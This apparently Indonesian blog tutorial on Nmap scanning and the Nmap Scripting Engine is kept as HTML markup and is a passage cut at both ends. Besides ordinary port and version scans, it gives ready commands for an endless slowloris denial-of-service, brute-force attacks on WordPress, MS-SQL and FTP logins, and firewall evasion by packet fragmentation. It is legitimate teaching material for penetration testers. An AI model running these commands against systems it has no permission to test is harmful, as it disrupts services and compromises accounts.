terbuka. Ini mengirimkan permintaan gema ICMP dan sebagai gantinya mendapat balasan gema ICMP jika tuan rumah masih hidup.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sP &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;P&lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;font-size: large;&quot;&gt;emindaian TCP SYN (-sS)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Dalam teknik ini, Nmap mengirim paket SYN ke tujuan, tetapi tidak membuat sesi apa pun. Akibatnya, komputer target tidak akan dapat membuat log interaksi apa pun karena tidak ada sesi yang dimulai.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sS &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;TCP Connect() Pindai (-sT)&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Soket UNIX menggunakan panggilan sistem bernama connect() untuk memulai koneksi TCP dan jika berhasil, koneksi dapat dibuat dan jika gagal, koneksi tidak dapat dibuat, pada dasarnya karena port mungkin ditutup.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sT &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Deteksi Versi (-sV)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Teknik ini digunakan untuk mencari tahu tentang layanan tertentu yang berjalan pada port terbuka, yaitu versi dan nama produk. Itu tidak digunakan untuk mendeteksi port terbuka. Namun, pemindaian ini memerlukan port terbuka untuk mendeteksi versinya. Ini menggunakan pemindaian TCP SYN untuk mengetahui tentang port terbuka.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sV &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Pemindaian idle/Diam (-sI)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Pemindaian diam adalah pemindaian lanjutan yang tidak mengirim paket apa pun dari alamat IP Anda, melainkan menggunakan host lain dari jaringan target untuk mengirim paket.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;Command: nmap -sI &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Pemindaian Nmap Dasar terhadap ip atau host:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sekarang, jika Anda ingin memindai nama host, cukup ganti IP untuk host tersebut, seperti yang Anda lihat di bawah:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap domain.com&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Pemindaian semacam ini, seperti host pemindaian Nmap, sempurna untuk langkah pertama Anda saat memulai dengan Nmap.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Nmap (pemindaian ping)&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -sp 192.168.5.0/24&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Jenis pemindaian yang paling terkenal adalah pemindaian ping Nmap (disebut demikian karena sering digunakan untuk melakukan sapuan ping Nmap), dan ini merupakan cara termudah untuk mendeteksi host di jaringan apa pun.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kelemahan dari jenis pemindaian khusus ICMP ini adalah bahwa host jarak jauh sering memblokir paket ping berbasis IP, jadi jika Anda tidak bisa mendapatkan hasil yang solid, sebaiknya beralih ke permintaan berbasis ARP untuk pemindaian Anda.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Pindai port tertentu atau pindai seluruh rentang port host:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -p 1-65535 &amp;lt;target&amp;gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Dalam contoh ini, kami memindai semua port 65535 untuk target kami.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Nmap dapat memindai semua kemungkinan port, tetapi Anda juga dapat memindai port tertentu, yang akan melaporkan hasil lebih cepat. Lihat di bawah:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -p 80,443 192.168.1.1&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Pindai host dan pembacaan alamat ip dari file teks:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Dalam hal ini, Nmap juga berguna untuk membaca file yang berisi host dan IP didalamnya. Misalkan Anda membuat file list.txt yang berisi baris-baris berikut di dalamnya:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;192.168.1.106&amp;nbsp;&lt;/p&gt;&lt;p&gt;cloudflare.com&amp;nbsp;&lt;/p&gt;&lt;p&gt;microsoft.com&amp;nbsp;&lt;/p&gt;&lt;p&gt;google.com&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Parameter &quot;-iL&quot; memungkinkan Anda membaca dari file itu, dan memindai semua host tersebut untuk Anda:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -iL list.txt&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Simpan hasil pemindaian nmap Anda dalam file teks:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Di sisi lain, dalam contoh berikut kita tidak akan membaca dari file, tetapi mengekspor/menyimpan hasil kita ke dalam file teks:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -oN output.txt google.com&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Nmap juga memiliki kemampuan untuk mengekspor file ke dalam format XML, lihat contoh berikut:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -oX output.xml google.com&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Menonaktifkan resolusi nama DNS:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Jika Anda perlu sedikit mempercepat pemindaian, Anda selalu dapat memilih untuk menonaktifkan resolusi DNS terbalik untuk semua pemindaian Anda. Cukup tambahkan parameter &quot;-n&quot; dan -Pn untuk menghindari penemuan host.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -p 80 -n -Pn 192.168.1.1&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Lihat perbedaannya dengan pemindaian yang mengaktifkan resolusi DNS normal:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -p 80 192.168.1.1&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Pindai OS dan deteksi layanan:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Menggunakan parameter &quot;-A&quot; memungkinkan Anda melakukan deteksi OS dan layanan, dan pada saat yang sama kami menggabungkannya dengan &quot;-T4&quot; untuk eksekusi yang lebih cepat. Lihat contoh di bawah ini:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -A -T4 cloudflare.com&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Pindai menggunakan protokol TCP atau UDP:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Salah satu hal yang paling kami sukai dari Nmap adalah fakta bahwa Nmap berfungsi untuk protokol TCP dan UDP. Dan sementara sebagian besar layanan berjalan di TCP, Anda juga bisa mendapatkan keuntungan besar dengan memindai layanan berbasis UDP. Mari kita lihat beberapa contoh.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Hasil pemindaian TCP menggunakan parameter “-sT”:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -sT 192.168.1.1&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Hasil pemindaian UDP menggunakan parameter “-sU”:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -sU 192.168.1.1&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Mesin Skrip Nmap (NSE)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTHYfAx1tCft-0P7390g0_nCEoefCtvGZSD4vRvPY4mGzomFAFWAocamJ0H4OuZhgeG6kgPwazNwxxLlvuNIN5PXjX_2Vi-qMCK5r3CrrelGHtfMr-dG9IlytsurP18Kk4O7k7_5TwSKFeXl11ZTGvMW_zohzvkXCQeJpasO0jwnM39rChwlrym4uk/s720/1_NwRx2Ctwxn6eBMxIs8Yyqw.webp&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;378&quot; data-original-width=&quot;720&quot; height=&quot;336&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTHYfAx1tCft-0P7390g0_nCEoefCtvGZSD4vRvPY4mGzomFAFWAocamJ0H4OuZhgeG6kgPwazNwxxLlvuNIN5PXjX_2Vi-qMCK5r3CrrelGHtfMr-dG9IlytsurP18Kk4O7k7_5TwSKFeXl11ZTGvMW_zohzvkXCQeJpasO0jwnM39rChwlrym4uk/w640-h336/1_NwRx2Ctwxn6eBMxIs8Yyqw.webp&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Apa itu NSE?&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;Nmap Scripting Engine (NSE) adalah salah satu fitur Nmap yang paling kuat dan fleksibel. Hal ini memungkinkan pengguna untuk menulis (dan berbagi) skrip sederhana untuk mengotomatiskan berbagai tugas jaringan. Skrip tersebut kemudian dieksekusi secara paralel dengan kecepatan dan efisiensi yang Anda harapkan dari Nmap. Pengguna dapat mengandalkan kumpulan skrip yang tumbuh dan beragam yang didistribusikan dengan Nmap, atau menulis skrip mereka sendiri untuk memenuhi kebutuhan khusus.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;NSE dirancang agar serbaguna, dengan mempertimbangkan tugas-tugas berikut:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;1. Penemuan jaringan&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Ini adalah roti dan mentega Nmap. Contohnya termasuk mencari data whois berdasarkan domain target, menanyakan ARIN, RIPE, atau APNIC untuk IP target guna menentukan kepemilikan, melakukan pencarian identitas pada port terbuka, kueri SNMP, dan mencantumkan berbagi dan layanan NFS/SMB/RPC yang tersedia.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;2. Deteksi versi yang lebih canggih&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Sistem deteksi versi Nmap mampu mengenali ribuan layanan yang berbeda melalui sistem pencocokan tanda tangan berbasis probe dan ekspresi reguler, tetapi tidak dapat mengenali semuanya. Misalnya, mengidentifikasi layanan Skype v2 memerlukan dua pemeriksaan independen, yang deteksi versinya tidak cukup fleksibel untuk ditangani. Nmap juga dapat mengenali lebih banyak layanan SNMP jika mencoba beberapa ratus nama komunitas yang berbeda dengan kekerasan. Tak satu pun dari tugas-tugas ini cocok untuk deteksi versi Nmap tradisional, tetapi keduanya mudah diselesaikan dengan NSE. Untuk alasan ini, deteksi versi sekarang memanggil NSE secara default untuk menangani beberapa layanan rumit.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;3. Deteksi kerentanan&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Ketika kerentanan baru ditemukan, Anda sering ingin memindai jaringan Anda dengan cepat untuk mengidentifikasi sistem yang rentan sebelum orang jahat melakukannya. Meskipun Nmap bukan pemindai kerentanan yang komprehensif, NSE cukup kuat untuk menangani bahkan pemeriksaan kerentanan yang menuntut. Saat bug Heartbleed memengaruhi ratusan ribu sistem di seluruh dunia, pengembang Nmap merespons dengan skrip deteksi ssl-heartbleed dalam waktu 2 hari. Banyak skrip deteksi kerentanan sudah tersedia dan kami berencana untuk mendistribusikan lebih banyak lagi saat ditulis.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;4. Deteksi backdoor&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Banyak penyerang dan beberapa worm otomatis meninggalkan pintu belakang untuk memungkinkan masuk kembali nanti. Beberapa di antaranya dapat dideteksi oleh deteksi versi berbasis ekspresi reguler Nmap, tetapi worm dan backdoor yang lebih kompleks membutuhkan kemampuan canggih NSE untuk mendeteksi secara andal. NSE telah digunakan untuk mendeteksi backdoor Double Pulsar NSA di SMB dan versi backdoor dari UnrealIRCd, vsftpd, dan ProFTPd.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;5. Eksploitasi kerentanan&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Sebagai bahasa skrip umum, NSE bahkan dapat digunakan untuk mengeksploitasi kerentanan daripada hanya menemukannya. Kemampuan untuk menambahkan skrip eksploitasi khusus mungkin bermanfaat bagi sebagian orang (khususnya penguji penetrasi), meskipun kami tidak berencana mengubah Nmap menjadi kerangka kerja eksploitasi seperti Metasploit.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Item yang terdaftar ini adalah tujuan awal kami, dan kami mengharapkan pengguna Nmap untuk menghasilkan penggunaan NSE yang lebih inventif.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Skrip ditulis dalam bahasa pemrograman Lua tersemat, versi 5.3. Bahasa itu sendiri didokumentasikan dengan baik dalam buku Pemrograman di Lua, Edisi Keempat dan Manual Referensi Lua 5.2. Manual referensi, diperbarui untuk Lua 5.3, juga tersedia secara online.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;NSE diaktifkan dengan opsi -sC (atau --script jika Anda ingin menentukan sekumpulan skrip khusus) dan hasilnya diintegrasikan ke dalam keluaran Nmap normal dan XML.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;6. Deteksi CVE menggunakan Nmap&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Salah satu fitur terhebat Nmap yang tidak semua administrator jaringan dan sistem ketahui adalah sesuatu yang disebut “Nmap Scripting Engine” (dikenal sebagai NSE). Mesin skrip ini memungkinkan pengguna untuk menggunakan serangkaian skrip yang telah ditentukan sebelumnya, atau menulis sendiri menggunakan bahasa pemrograman Lua.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Menggunakan skrip Nmap sangat penting untuk mengotomatiskan pemindaian sistem dan kerentanan. Misalnya, jika Anda ingin menjalankan pengujian kerentanan penuh terhadap target, Anda dapat menggunakan parameter berikut:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -Pn --script vuln 192.168.1.105&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;7. Meluncurkan serangan DOS dengan nmap&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Fitur Nmap sepertinya tidak pernah berakhir, dan berkat NSE, itu bahkan memungkinkan kami meluncurkan serangan DOS terhadap pengujian jaringan kami.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;misalnya kita dapat mencoba mengeksploitasi kerentanan slowloris dengan meluncurkan serangan DOS dalam loop selamanya:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;nmap 192.168.1.105 -max-parallelism 8&amp;nbsp;&lt;/p&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;p&gt;00 -Pn --script http-slowloris --script-args http-slowloris.runforever=true&lt;/p&gt;&lt;div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;8. Meluncurkan serangan bruteforce dengan nmap&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;NSE sangat menarik – berisi skrip untuk semua yang dapat Anda bayangkan. Lihat tiga contoh BFA berikutnya terhadap WordPress, MSSQL, dan server FTP:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1. Serangan brute force WordPress:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;nmap -sV --script http-wordpress-brute --script-args &#39;userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3 ,brute.firstonly=true&#39; 192.168.1.105&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;2. Serangan brute force terhadap MS-SQL:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;3. Serangan brute force FTP:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;nmap --script ftp-brute -p 21 192.168.1.105&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;b&gt;9. Mendeteksi infeksi malware pada remote host&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Nmap mampu mendeteksi malware dan backdoors dengan menjalankan pengujian ekstensif pada beberapa layanan OS populer seperti pada Identd, Proftpd, Vsftpd, IRC, SMB, dan SMTP. Ini juga memiliki modul untuk memeriksa tanda-tanda malware populer di dalam server jarak jauh dan juga mengintegrasikan database Safe Browsing dan VirusTotal Google.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Pemindaian malware umum dapat dilakukan dengan menggunakan:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -sV --script=http-malware-host 192.168.1.105&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Atau menggunakan cek Malware Google:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;nmap -p80 --script http-google-malware infectedsite.com&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Mendeteksi infeksi malware pada remote host&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;1. Paket Fragmen&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Teknik ini sangat efektif terutama di masa lalu namun Anda masih dapat menggunakannya jika menemukan firewall yang tidak dikonfigurasi dengan benar. Nmap menawarkan kemampuan untuk memecah-mecah paket saat memindai dengan opsi -f sehingga dapat melewati pemeriksaan paket firewall.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;2. Tentukan MTU tertentu&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Nmap memberikan opsi kepada pengguna untuk mengatur MTU (Maximum Transmission Unit) tertentu ke paket. Ini mirip dengan teknik fragmentasi paket yang telah kami jelaskan di atas. Selama pemindaian, ukuran nmap akan membuat paket berdasarkan ukuran pada nomor yang akan kami berikan. Pada contoh ini kami memberikan nomor 24 sehingga nmap akan membuat paket 24 byte yang menyebabkan kebingungan pada firewall.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Perlu diingat bahwa nomor MTU 